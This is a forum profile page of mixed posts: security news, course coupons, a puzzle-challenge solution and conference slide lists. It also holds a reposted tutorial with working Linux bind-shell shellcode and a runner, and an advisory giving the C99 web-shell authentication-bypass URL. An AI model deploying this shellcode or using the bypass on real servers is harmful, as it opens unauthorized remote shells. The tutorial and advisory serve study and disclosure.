
Usr6

Everything posted by Usr6

  1. https://www.mediafire.com/folder/5xks9ksoz8k73/ Source: https://evilzone.org/ebooks/ebooks-for-beginners/msg81046/#msg81046
  2. CSS322, Semester 2, 2013, Lectures at Sirindhorn International Institute of Technology, Thammasat University, Thailand by Steven Gordon. Course material via: Teaching | Steven Gordon

    Introduction to Security and Cryptography (CSS322, Lecture 1, 2013) 59:26
    Introduction to Encryption Techniques (CSS322, Lecture 2, 2013) 1:21:39
    More Classical Ciphers (CSS322, Lecture 3, 2013) 1:17:37
    Simplified DES Example (CSS322, Lecture 5, 2013) 44:19
    Block Cipher Concepts (CSS322, Lecture 4, 2013) 1:20:20
    DES Design and Meet-in-the-Middle Attack on Double DES (CSS322, Lecture 6, 2013) 1:25:01
    Pseudo Random Number Generators (CSS322, Lecture 7, 2013) 1:05:35
    Stream Ciphers and Number Theory (CSS322, Lecture 8, 2013) 1:19:36
    Number Theory (CSS322, Lecture 9, 2013) 1:03:39
    RSA Details (CSS322, Lecture 11, 2013) 1:10:43
    Public Key Cryptography and RSA (CSS322, Lecture 10, 2013) 1:19:54
    Breaking RSA (CSS322, Lecture 12, 2013) 36:43
  3. Solution

    Level 1: The gif file had to be opened in a hex/text editor; at the end of it there was a link for downloading an archive:

        0002a2c0h: 07 52 7F 42 D8 97 C0 82 78 CC 90 40 40 00 3B 68 ; .RBØ—À‚xÌ@@.;h
        0002a2d0h: 74 74 70 73 3A 2F 2F 77 77 77 2E 73 65 6E 64 73 ; ttps://www.sends
        0002a2e0h: 70 61 63 65 2E 63 6F 6D 2F 66 69 6C 65 2F 77 71 ; pace.com/file/wq
        0002a2f0h: 35 6A 75 77 ; 5juw

    0, 1, 1, 2, 3, 5, 8... that is, "fibonacci", the archive password

    Level 2:
    hint: continuing...
    encrypted text: owbhoqfwqvebmbrlfovsijaweysndajltahmlsmkjayvkqotjaqpkguxwmakfxybiajilxhcxopalesftjulthuoniitmuqntkjvzlubflapsykucgfheuwsqsqmicrjkskmcfhsblzltpoeobvorxfgsvwqoeexycnzuimhlxpkgzfxpoowbhggpfdekexzvgtyeoyqxcvlgahcltzlgbjghkvlcjonmfjtgoyml
    "continuing..." = the continuation of the previous fibonacci sequence: 13, 21, 34, 55, 89, 144, 233
    owbhoqfwqvebmbrlfovsijaweysndajltahmlsmkjayvkqotjaqpkguxwmakfxybiajilxhcxopalesftjulthuoniitmuqntkjvzlubflapsykucgfheuwsqsqmicrjkskmcfhsblzltpoeobvorxfgsvwqoeexycnzuimhlxpkgzfxpoowbhggpfdekexzvgtyeoyqxcvlgahcltzlgbjghkvlcjonmfjtgoyml
    miaunel = access password for level 3

    Level 3:
    Hints: 5x5 1 6 2 11 7 3 16 12 8 4 etc.
    Additional hints: 5x5 = 5*5= 25

         1  2  3  4  5
         6  7  8  9 10
        11 12 13 14 15
        16 17 18 19 20
        21 22 23 24 25

    encrypted text: m adbtaalz r aaraznaigueu
    that is: matza blan da zg araie rauu
    the solution of the challenge was: "matza blanda zgaraie rauu"

    Solved the challenge: @gio33
    Congratulations to those who managed to unravel the mystery of the dancing tomcat
  4. A Bloomberg Businessweek report has revealed that the CIA, NSA, and other agencies spent months investigating a major malware attack on Nasdaq, revealing the stock exchange service's vulnerability. In 2010, the FBI picked up hints that an intruder had compromised Nasdaq's central servers. After looking closer, experts realized that the malware wasn't meant for surveillance — it was potentially capable of disrupting trading or even, in the NSA's initial opinion, "wiping out the entire exchange." While Nasdaq had apparently detected some kind of problem, it had not reported it, and government investigators found a mess of earlier, apparently undetected intrusions. "Agents found the tracks of several different groups operating freely, some of which may have been in the exchange's networks for years," says Businessweek. And "basic records of the daily activity occurring on the company's servers, which would have helped investigators trace the hackers' movements, were almost nonexistent." From what the NSA's intelligence could detect, the malware was the work of a government, not independent hackers. A similar strain of malware had been designed by the Russian FSB, but it was also possible it had been used by another country — China was a primary suspect — for both its intrinsic features and its ability to confuse an investigation. Rep. Mike Rogers (R-MI) officially confirmed an attack in broad terms. "We've seen a nation-state gain access to at least one of our stock exchanges, I'll put it that way, and it's not crystal clear what their final objective is," he said. "The bad news of that equation is, I'm not sure you will really know until that final trigger is pulled. And you never want to get to that." But politics also make it hard to determine what happened. According to Businessweek, some officials believed the NSA may have played up the danger of the attack and the connection to Russia. 
Then-head Keith Alexander was a strong proponent of increasing the US cyberwarfare force; years later, he pushed for stronger legal authority in order to prevent something like a "cyberpacket that's going to destroy Wall Street." Rogers, a notably hawkish member of Congress, would also be likely to take the attack as seriously as possible. Later analysis of the malware indicated that although it could disrupt the stock market, it couldn't wipe a network. After the CIA conducted its own investigation, the White House reportedly began to consider it an attempt at financial crime, not terrorism. But Businessweek, which previously conducted an in-depth investigation on the Target system hack, says that the situation is still extremely murky four years later. If it was the work of the Russian government, many unanswered questions remain, especially why it was found during a period when relations were friendlier than usual. Unfortunately, Nasdaq's apparent lack of comprehensive records could make answers impossible to find.

Update and correction July 17th, 1:30PM ET: Nasdaq spokesperson Joe Christinat says that the malware did not reach the stock exchange, as originally stated in the headline. "The events of four years ago, while sensationalized by Businessweek, only confirm what we have said — that none of Nasdaq's trading platforms or engines were ever compromised and no evidence of exfiltration exists from Directors Desk."

Source: Russian malware infiltrated the Nasdaq servers, says Businessweek | The Verge
  5. Sucuri " This vulnerability was discovered by the Romanian Security Team (RST), so it could already be used in the wild on 0-day attacks. If you can’t patch vBulletin, we recommend blocking access to the memberlist page in the mean time. "
  6. Usr6

    Udemy

    Android Programming for Newbies Start your way into Android Development without any programming knowledge https://www.udemy.com/android-app-programming/?couponCode=APINTRO
  7. Yesterday, an international organised cybercrime network, composed mostly of Romanian citizens, was successfully taken down in Romania(1) and France(2) with the support of the European Cybercrime Centre (EC3) at Europol. The cybercrime network is suspected of sophisticated electronic payment crimes including intrusions into international non-cash payment systems (through malware attacks), illegal worldwide financial transactions and money transfers, card data compromising (via skimming attacks), money laundering and drug trafficking. Members of this criminal network were using malware – RAT (Remote Access Tool) with key logger functionality - to take over and gain access to computers used by money transfer services all over Europe (Austria, Belgium, Germany, Norway, UK). More than 115 individuals were interrogated and 65 detained in coordinated raids by Romanian and French law enforcement and judicial authorities, supported on the spot by the European Cybercrime Centre (EC3). Large sums of money, luxury vehicles, IT equipment and variety of evidence were seized during the raids. Around 450 police officers were deployed to execute 117 house search warrants during the operation. Losses incurred by the criminals' activities are estimated to be at least two million euros. The proceeds of their crimes were invested in different types of property, deposited in bank accounts or transferred electronically to hide their illicit origin. The Head of the European Cybercrime Centre (EC3), Troels Oerting, said: "As a direct result of the excellent cooperation and outstanding work by police officers and prosecutors from Romania, France and other European countries, a key criminal network has been successfully taken down this week. EC3's role was to effectively facilitate international cooperation, including the exchange of intelligence, and to provide resources where needed. 
After many months and a great effort from all involved, many individuals have now been detained after key locations were identified and targeted by law enforcement. The resounding success of such an operation is not the first and will not be the last, as police officers and prosecutors, alongside EC3, continue in their tireless endeavours to make payment transactions safer for customers throughout Europe and beyond." Operations such as this one demonstrate the crucial role of exchanging intelligence through Europol channels and the importance of international coordination at different operational stages including the final execution at European level. EC3 organised several operational meetings at Europol headquarters in The Hague, provided analysis, and simultaneously deployed mobile offices and technical support on the spot in the cooperating countries.

(1) Directorate for Investigating Organized Crime and Terrorism (DIICOT) from Craiova city; Romanian National Police, including the Brigade for Combating Organized Crime from Craiova city, the Service of Intelligence & Internal Protection from Craiova and the National Intelligence Service
(2) Judicial French Police (BFMP DPJ) – Brigade of Combating Payment Fraud in Paris

Source: https://www.europol.europa.eu/content/international-network-romanian-cybercriminals-dismantled
  8. CyberGhost on WindowsDeal | CyberGhost VPN or: CyberGhost 5 Premium VPN (100% Discount) Deal Expires in: 2 day(s) 9 hour(s) 9min(s)
  9. Usr6

    Udemy

    Catia V5 Essentials: In these series you will learn how to use Catia v5 (one of the most powerful design and analysis tools available) to design simple or complex parts, assemble them, simulate different parameters and variables to see how your part will act in normal and critical situations and more. You will learn advanced use of Catia in certain industries in the second part of these lessons. https://www.udemy.com/catia-v5-essentials/?couponCode=CATIA-V5-100
  10. Additional hint: 5x5 = 5*5= 25

         1  2  3  4  5
         6  7  8  9 10
        11 12 13 14 15
        16 17 18 19 20
        21 22 23 24 25

    The answer to level 3 is closely related to the dancer in the picture.
  11. Sunday challenge: Download: https://www.sendspace.com/file/yj7dda
    Hint 0: it may not be visible at first glance, but it exists
    Hint 1: you learned it at school, or... you should have...
    p.s.: all passwords start with a lowercase letter
    p.s.2: don't overcomplicate things needlessly
  12. WTF is a bind shell?

    Before starting this exercise, my understanding of a bind shell was the following: it is a socket that allows you to send commands to a program and receive the responses over a network. This is not very helpful when trying to build your own except that you think you need a socket, port and an executable. Instead of guessing, let's take a look at some other bind shell shellcode and see what it does.

    Metasploit is far from the only way to get your hands on shellcode. There are several sites that host shellcode that you can use for yourself such as Exploit Database from Offensive Security, Project Shellcode from Ty Miller and Shell Storm from Jonathan Salwan. Let's grab a small bind shell from Shell Storm and see what it does. First, create a folder to place your working files in.

        mkdir bindshell

    Go to the following url and take a look at the content. It contains the content of a C file and instructions on how to compile and run it. http://shell-storm.org/shellcode/files/shellcode-836.php

        /*
         Tiny Shell Bind TCP Shellcode - C Language
         Linux/x86

         Written in 2013 by Geyslan G. Bem, Hacking bits

           http://hackingbits.com
           geyslan@gmail.com

         This source is licensed under the Creative Commons
         Attribution-ShareAlike 3.0 Brazil License.

         To view a copy of this license, visit

           http://creativecommons.org/licenses/by-sa/3.0/

         You are free:

            to Share - to copy, distribute and transmit the work
            to Remix - to adapt the work
            to make commercial use of the work

         Under the following conditions:
           Attribution - You must attribute the work in the manner
                         specified by the author or licensor (but
                         not in any way that suggests that they
                         endorse you or your use of the work).

           Share Alike - If you alter, transform, or build upon
                         this work, you may distribute the
                         resulting work only under the same or
                         similar license to this one.
        */

        /*
         tiny_shell_bind_tcp_shellcode

         * 73 bytes
         * null-free if the port is

         # gcc -m32 -fno-stack-protector -z execstack tiny_shell_bind_tcp_shellcode.c -o tiny_shell_bind_tcp_shellcode

         Testing
         # ./tiny_shell_bind_tcp_shellcode
         # nc 127.0.0.1 11111
        */

        #include <stdio.h>
        #include <string.h>

        unsigned char code[] = \
        "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a"
        "\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68"
        "\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1"
        "\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd"
        "\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f"
        "\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f"
        "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
        "\x41\xcd\x80";

        main ()
        {
            // When the Port contains null bytes, printf will show a wrong shellcode length.
            printf("Shellcode Length: %d\n", strlen(code));

            // Pollutes all registers ensuring that the shellcode runs in any circumstance.
            __asm__ ("movl $0xffffffff, %eax\n\t"
                     "movl %eax, %ebx\n\t"
                     "movl %eax, %ecx\n\t"
                     "movl %eax, %edx\n\t"
                     "movl %eax, %esi\n\t"
                     "movl %eax, %edi\n\t"
                     "movl %eax, %ebp\n\t"
                     // Setting the port
                     "movw $0x672b, (code+20)\n\t"
                     // Calling the shellcode
                     "call code");
        }

    This may look big and scary now but we’re only interested in seeing what it does so we can figure out how to write our own. Leave that page open for now, we’ll come back to it shortly.

    Create a file in your bindshell folder called shellcode.c

        cd bindshell
        nano shellcode.c

    Paste the following code into the shellcode.c file we just opened.

        #include <stdio.h>
        #include <string.h>

        unsigned char code[] = \
        "";

        int main(void)
        {
            /* Print the length, then jump into the byte array as if it were a function. */
            printf("Shellcode Length: %zu\n", strlen((const char *)code));
            int (*ret)() = (int(*)())code;
            ret();
        }

    Now grab just the shellcode from the Shell Storm page and paste it into this new file ensuring the formatting looks like this.

        #include <stdio.h>
        #include <string.h>

        unsigned char code[] = \
        "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a"
        "\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68"
        "\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1"
        "\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd"
        "\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f"
        "\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f"
        "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
        "\x41\xcd\x80";

        int main(void)
        {
            /* Print the length, then jump into the byte array as if it were a function. */
            printf("Shellcode Length: %zu\n", strlen((const char *)code));
            int (*ret)() = (int(*)())code;
            ret();
        }

    Save and close the file

        CTRL + O             <-- Save File
        {ENTER/RETURN KEY}   <-- Accept the Filename
        CTRL X               <-- Exit

    Great, we’ve just created a C file that will print our shellcode length and then run it, but before we can do that, we need to compile it into a binary file.

    To be able to compile this file, we need a compiler such as GCC (GNU Compiler Collection) which will turn our source code into a binary file. Assuming you’re running this on a Debian based distro such as Ubuntu, Kali Linux, BackTrack or your own distro, you can use Aptitude to install GCC

        sudo apt-get install gcc

    Because we’re going to compile shellcode often, let's create a script that we can reuse to compile our shellcode.c file. Create a new file called compile.sh and paste the following into it

        #!/bin/bash
        # Build shellcode.c by default, or <name>.c when a name is given.
        if [ -z "$1" ]
        then
            gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
        else
            gcc -m32 -fno-stack-protector -z execstack "$1.c" -o "$1"
        fi

    What this file will do is check to see if you have passed any argument to the script, if not it assumes that the file you want to compile is called “shellcode.c” which in this case is true. Then the script will run GCC with the following options:

        -m32 tells the compiler we're building this source code for a 32 bit operating system
        -fno-stack-protector will disable the stack protection mechanisms in GCC
        -z execstack will allow our stack to be executable
        shellcode.c is the file with the source code
        -o shellcode is the binary file we want to create with our source code

    Now we need to make this new script executable.

        chmod +x compile.sh

    That’s it, run the script and you should have a brand new binary that can create bind shells.

        ./compile.sh

    We’re not interested in running this binary right now, we’re only interested in finding out what it does. So let's take a look inside and see what this shellcode is doing. To do this, we are going to use a tool called “objdump“, part of Gnu Binary Utilities, which will look at our shellcode and show us what it’s doing. To install these tools run:

        sudo apt-get install binutils

    Now that we have objdump installed, let's disassemble our binary.

        objdump -D shellcode -M intel

    Wow, that is a lot of assembly code. The part we’re interested in is:

        08049700 <code>:
         8049700:  31 db           xor    ebx,ebx
         8049702:  f7 e3           mul    ebx
         8049704:  b0 66           mov    al,0x66
         8049706:  43              inc    ebx
         8049707:  52              push   edx
         8049708:  53              push   ebx
         8049709:  6a 02           push   0x2
         804970b:  89 e1           mov    ecx,esp
         804970d:  cd 80           int    0x80
         804970f:  5b              pop    ebx
         8049710:  5e              pop    esi
         8049711:  52              push   edx
         8049712:  66 68 2b 67     pushw  0x672b
         8049716:  6a 10           push   0x10
         8049718:  51              push   ecx
         8049719:  50              push   eax
         804971a:  b0 66           mov    al,0x66
         804971c:  89 e1           mov    ecx,esp
         804971e:  cd 80           int    0x80
         8049720:  89 51 04        mov    DWORD PTR [ecx+0x4],edx
         8049723:  b0 66           mov    al,0x66
         8049725:  b3 04           mov    bl,0x4
         8049727:  cd 80           int    0x80
         8049729:  b0 66           mov    al,0x66
         804972b:  43              inc    ebx
         804972c:  cd 80           int    0x80
         804972e:  59              pop    ecx
         804972f:  93              xchg   ebx,eax
         8049730:  6a 3f           push   0x3f
         8049732:  58              pop    eax
         8049733:  cd 80           int    0x80
         8049735:  49              dec    ecx
         8049736:  79 f8           jns    8049730 <code+0x30>
         8049738:  b0 0b           mov    al,0xb
         804973a:  68 2f 2f 73 68  push   0x68732f2f
         804973f:  68 2f 62 69 6e  push   0x6e69622f
         8049744:  89 e3           mov    ebx,esp
         8049746:  41              inc    ecx
         8049747:  cd 80           int    0x80
         8049749:  00 00           add    BYTE PTR [eax],al

    We can see xor, push, pop, inc and some other functions but we still don’t really know the steps involved to create our own bind shell. Let's move on to something that will make this even easier to understand.

    Libemu is an x86 Shellcode Emulation tool that can make following and understanding shellcode much easier. Download and install libemu, following this procedure:

    Firstly, we’re going to need Git. If you don’t already have git installed, install it now

        sudo apt-get install git

    Once you have git installed, clone the libemu repo into your temp folder

        cd /tmp
        git clone git://git.carnivore.it/libemu.git

    You’ll also need some dependencies to get libemu installed and running

        sudo apt-get install build-essential autoconf libtool python-dev graphviz

    Now go into the libemu folder we cloned

        cd /tmp/libemu/

    Run these commands to configure and build libemu

        autoreconf -v -i
        ./configure --enable-python-bindings --prefix=/opt/libemu
        sudo make install
        sudo ldconfig -n /opt/libemu/lib

    We should now have a libemu folder installed in /opt/libemu/

    We now need to prepare our shellcode for libemu. Start by grabbing just the shellcode and place it in a file called shellcode.hex

        cat shellcode.hex
        \x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a
        \x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68
        \x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1
        \xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd
        \x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f
        \x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f
        \x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3
        \x41\xcd\x80

    Next, we’re going to create an alias called hex2raw. Add this line to your .bashrc file if you want this to be permanently available.

        alias hex2raw="tr -d '\\\x' | xxd -r -p"

    Now let's convert our hex code to raw code.

        cat shellcode.hex | hex2raw > shellcode.raw

    If all went well, you should have a new file called shellcode.raw

    We now have everything we need to see what this bind shell is doing, let's run libemu on this raw code

        cat shellcode.raw | /opt/libemu/bin/sctest -vvv -Ss 99999 -G shellcode.dot

    The last step is to convert the shellcode.dot graph into an image so we can view it

        dot -Tpng -o shellcode.png shellcode.dot

    Great, we now have a shellcode.png file, let's take a look at it

    EPIC, now we can see what this shellcode is doing a lot clearer and we can also see the system calls that it is making. We will use these to create our own bind shell shellcode. We can see that the first call being made is the socket call, followed by the bind call, then the listen and accept calls. Then the code loops through the dup2 call several times and finally execve is called.

    We finally have our bind shell process:

        1. Socket
        2. Bind
        3. Listen
        4. Accept
        5. Dup2
        6. Execve

    Source:
    part 1: disassembling and understanding shellcode - hacker for hire
    part 2: building the shellcode: part 2: building the shellcode - hacker for hire
    part 3: cleaning and optimising shellcode: part 3: cleaning and optimising shellcode - hacker for hire
      • 1
      • Upvote
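The syscall sequence that the libemu graph reveals in the post above can also be recovered statically when triaging a captured sample. The following is an added example, not part of the original post or the tutorial it quotes: a small Python tracer restricted to the opcodes this 73-byte sample uses. The function and table names are assumptions made here; it treats 8-bit moves as setting the whole register and does not follow the `jns` loop.

```python
import struct

# The 73 shellcode bytes exactly as listed in the post (Linux/x86).
SHELLCODE = bytes.fromhex(
    "31dbf7e3b0664352536a" "0289e1cd805b5e526668"
    "2b676a105150b06689e1" "cd80895104b066b304cd"
    "80b06643cd8059936a3f" "58cd804979f8b00b682f"
    "2f7368682f62696e89e3" "41cd80"
)

# i386 syscall numbers: 0x66 socketcall (sub-call chosen by ebx), 0x3f dup2, 0x0b execve.
SOCKETCALL = {1: "socket", 2: "bind", 4: "listen", 5: "accept"}
SYSCALLS = {0x3F: "dup2", 0x0B: "execve"}
PUSH_REG = {0x50: "eax", 0x51: "ecx", 0x52: "edx", 0x53: "ebx"}
POP_REG = {0x58: "eax", 0x59: "ecx", 0x5B: "ebx", 0x5E: "esi"}
INC_DEC = {0x41: ("ecx", 1), 0x43: ("ebx", 1), 0x49: ("ecx", -1)}


def trace(code):
    """Linear sweep over the sample; returns (syscalls, port, execve_path).

    Registers hold an int when statically known, else None. Simplifications
    (assumptions of this sketch): 8-bit moves set the whole register, syscall
    return values are unknown, and the jns loop is not followed.
    """
    reg = dict.fromkeys(("eax", "ebx", "ecx", "edx", "esi"))
    stack, calls, dwords, word, port = [], [], [], None, None
    i = 0
    while i < len(code):
        op, two = code[i], code[i:i + 2]
        if two == b"\x31\xdb":                      # xor ebx,ebx
            reg["ebx"] = 0
            i += 2
        elif two == b"\xf7\xe3":                    # mul ebx: edx:eax = eax*ebx
            reg["eax"] = reg["edx"] = 0 if reg["ebx"] == 0 else None
            i += 2
        elif op in (0xB0, 0xB3):                    # mov al,imm8 / mov bl,imm8
            reg["eax" if op == 0xB0 else "ebx"] = code[i + 1]
            i += 2
        elif op in INC_DEC:                         # inc/dec r32
            name, delta = INC_DEC[op]
            if reg[name] is not None:
                reg[name] += delta
            i += 1
        elif op in PUSH_REG:                        # push r32
            stack.append(reg[PUSH_REG[op]])
            i += 1
        elif op in POP_REG:                         # pop r32
            reg[POP_REG[op]] = stack.pop() if stack else None
            i += 1
        elif op == 0x6A:                            # push imm8
            stack.append(code[i + 1])
            i += 2
        elif op == 0x68:                            # push imm32 (string data here)
            dwords.append(code[i + 1:i + 5])
            stack.append(None)
            i += 5
        elif two == b"\x66\x68":                    # pushw imm16
            word = code[i + 2:i + 4]
            stack.append(None)
            i += 4
        elif two in (b"\x89\xe1", b"\x89\xe3"):     # mov ecx,esp / mov ebx,esp
            reg["ecx" if two[1] == 0xE1 else "ebx"] = None
            i += 2
        elif code[i:i + 3] == b"\x89\x51\x04":      # mov [ecx+4],edx
            i += 3
        elif op == 0x93:                            # xchg ebx,eax
            reg["eax"], reg["ebx"] = reg["ebx"], reg["eax"]
            i += 1
        elif op == 0x79:                            # jns rel8 (not followed)
            i += 2
        elif two == b"\xcd\x80":                    # int 0x80
            nr = reg["eax"]
            if nr == 0x66:
                name = SOCKETCALL.get(reg["ebx"], f"socketcall({reg['ebx']})")
            else:
                name = SYSCALLS.get(nr, f"syscall({nr})")
            if name == "bind" and word is not None:
                # sin_port sits in the sockaddr in network byte order
                port = struct.unpack(">H", word)[0]
            calls.append((i, name))
            reg["eax"] = None                       # return value unknown
            i += 2
        else:
            raise ValueError(f"unsupported opcode {op:#04x} at offset {i}")
    # The last dword pushed lands at the lowest address, so reverse push order.
    path = b"".join(reversed(dwords))
    return calls, port, path


if __name__ == "__main__":
    calls, port, path = trace(SHELLCODE)
    for offset, name in calls:
        print(f"code+{offset:#04x}  {name}")
    print("listening port:", port, " execve path:", path.decode())
```

The offsets it reports line up with the `int 0x80` rows of the objdump listing, and the recovered port matches the `nc 127.0.0.1 11111` test command in the quoted source.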
  13. # Exploit Title: C99 Shell Authentication Bypass via Backdoor
    # Google Dork: inurl:c99.php
    # Date: June 23, 2014
    # Exploit Author: mandatory ( Matthew Bryant )
    # Vendor Homepage: http://ccteam.ru/
    # Software Link: https://www.google.com/
    # Version: < 1.00 beta
    # Tested on:Linux
    # CVE: N/A

    All C99.php shells are backdoored. To bypass authentication add "?c99shcook[login]=0" to the URL.

    e.g. http://127.0.0.1/c99.php?c99shcook[login]=0

    The backdoor:

        @extract($_REQUEST["c99shcook"]);

    Which bypasses the authentication here:

        if ($login) {
            if (empty($md5_pass)) {
                $md5_pass = md5($pass);
            }
            if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
                if ($login_txt === false) {
                    $login_txt = "";
                } elseif (empty($login_txt)) {
                    $login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html));
                }
                header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");
                header("HTTP/1.0 401 Unauthorized");
                exit($accessdeniedmess);
            }
        }

    For more info: http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/

    ~mandatory

    Source: http://www.exploit-db.com/exploits/34025/
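A detection sketch for the request pattern described in the advisory above, added here and not part of the advisory or the exploit-db entry: it scans web access logs for any query parameter named `c99shcook[...]`, raw or percent-encoded, and reports which variable each request tried to overwrite. The log lines are constructed samples in Apache combined format, and the function name is an assumption.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines (Apache combined log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [23/Jun/2014:10:01:02 +0000] "GET /uploads/c99.php?c99shcook[login]=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Jun/2014:10:01:09 +0000] "GET /img/x.php?a=1&c99shcook%5Blogin%5D=0 HTTP/1.1" 200 7301 "-" "Mozilla/5.0"
203.0.113.20 - - [23/Jun/2014:10:02:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [23/Jun/2014:10:03:00 +0000] "GET /uploads/c99.php HTTP/1.1" 401 381 "-" "curl/7.30"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# PHP turns c99shcook[name]=value into $_REQUEST["c99shcook"]["name"], and
# extract() then creates $name, so the bracketed key is the overwritten variable.
PARAM_RE = re.compile(r"c99shcook(?:\[([^\]]*)\])?")


def find_c99shcook_requests(lines):
    """Return one record per request that carries a c99shcook parameter."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        path, _, query = m["target"].partition("?")
        overrides = {}
        # parse_qsl percent-decodes names, so %5B / %5D variants match too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            pm = PARAM_RE.fullmatch(name)
            if pm:
                overrides[pm.group(1) or ""] = value
        if overrides:
            hits.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": path,
                "status": int(m["status"]),
                "overrides": overrides,
            })
    return hits


if __name__ == "__main__":
    for hit in find_c99shcook_requests(SAMPLE_LOG.splitlines()):
        print(hit["time"], hit["ip"], hit["path"], hit["status"], hit["overrides"])
```

`$_REQUEST` is also populated from POST bodies and cookies, which access logs do not normally record, so this covers only the query-string form shown in the advisory. Each reported path is also a file to inspect on disk, since it identifies where a shell is installed.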
  14. Usr6

    Udemy

    iOS - professional mobile developer During this training you will create 3 advanced applications, that you can extend according your ideas! 1. Task Manager 2. Picasa Galery 3. Stargate Battle https://www.udemy.com/ios-professional-mobile-developer/?couponCode=iOS_free
  15. The social networking giant has managed to take down a Greek botnet that used Facebook to spread malware and infected 250,000 computers to mine crypto-currencies, steal bitcoins, email passwords and banking details. Facebook is always one of the favourite weapon of cyber criminals, cyber thieves and scammers due to its popularity among other social media platforms. This social networking platform, with more than one billion active users, provides special opportunities for people to connect and share information, as well as also serves a great platform for malware developers and scammers. The botnet, dubbed as Lecpetex, was around from December 2013 to last month and compromised around 50,000 Facebook accounts at its peak, under which users would receive spam Facebook messages that would typically like "lol" with a zip archive attachment. Once the attachment is opened, it would execute an embedded Java archive file that would download Lecpetex main module and install a program to begin Litecoin mining secretly on the infected computer, and at the same time, other malware sent out from the botnet would steal bitcoins, email passwords and internet banking details. Moreover, the module would download and run the Facebook spamming module that would hijack user’s account by stealing cookies from their browser in an effort to gain access to the victim's Facebook friend list so that it could further send out more spam messages to each friend with a zip file containing malware. The Lecpetex botnet infect computers with family of different malware, including the DarkComet remote access trojan, through simple social engineering techniques, and the operators behind it were constantly modifying it in order to evade detection, both by Facebook's attachment scanning software as well as anti-virus software. 
Security researchers at Menlo Park said the 31 and 27 year-old botnet creators delivered over 20 distinct spam campaigns, affecting users in Greece, Poland, Norway, India, Portugal, and the US. Not even the malware targeted Facebook alone, the malware was also delivered through torrent files containing pirated content like movies, games and MP3s to trick unwitting downloaders, but this was not observed by Facebook bods. "On April 30, 2014, we escalated the Lecpetex case to the Cybercrime Subdivision of the Greek Police, and the agency immediately showed strong interest in the case," Facebook engineers wrote in an unauthored post. After five months of examination, irritated botnet creators began leaving messages for Facebook engineers from their command and control servers saying that: "Hello people.. but am not the f***ing zeus bot/skynet bot or whatever piece of sh*t.. no fraud here.. only a bit of mining. Stop breaking my ballz.." They also changed their crypto keys to the phrase 'IdontLikeLecpetexName'. But Facebook didn’t stop its investigation and continued to target botnet with new countermeasures and automated tools in order to extract more information from the botnet to trace its creators, and finally the Greek Police arrested two hackers last week, a 31-year-old and a 27-year-old who were both informatics students. "According to the Greek Police, the authors were in the process of establishing a Bitcoin 'mixing' service to help launder stolen Bitcoins at the time of their arrest," said Facebook. “Ultimately, remediating a threat like Lecpetex requires a combination of technical analysis capabilities, industry collaboration, agility in deploying new countermeasures, and law enforcement cooperation." The Greek Reporter says that the Lecpetex operation is the biggest case ever handled by Greece's Cyber Crime Unit.

Source: Facebook Takes Down Bitcoin Stealing Botnet that Infected 250,000 Computers - The Hacker News
  16. Match replay on TVR1 at 11.00
  17. Usr6

    Motto RST

    because of you and others like you it was removed...

    (20:36:30) kempactick: man, what times those were when people spammed with /motto
    (20:37:40) kempactick: I was screwing with you all with the spam )))
    (20:38:20) RST: Zatarra has been logged out (Timeout).
    (20:38:50) kempactick: em, are you there?
    (20:39:24) Byte-ul: then people spammed with rst regulament
    (20:39:25) Byte-ul:
    (20:39:43) kempactick: wtf, /motto wasn't visible..
    (20:40:15) kempactick: the moderators kept wondering who the hell was spamming, until one day zatarea removed motto
    (20:40:43) kempactick: screw that, man, how can you remove something like that?
  18. FunCap.pdf Fuzzing and Patch Analysis - SAGEly Advice.pptx McSema.pdf Memory_Tracing_Forensic.pdf PANDA REcon.pdf PANDA REcon.zip Performing Open Heart Surgery on a Furby Recon RECON2014_OFLYNN.pdf Recon 2014 Skochinsky.pdf Recon14_HDD.pdf Reverse Engineering Flash Memory for Fun And Benefit The Making of the Kosher Phone.pdf Wartortell_Recon2014.pptx milan-REcon14 slides.pdf mjanus_recon.pptx pinpoint_control_for_analyzing_malware_recon2014 recon-2014-ossmann-hackrf.pdf reversing_on_the_edge_recon14_jspelman_jjones.pdf * in the coming days others may appear as well + video Index of /2014/slides/
      • 1
      • Upvote
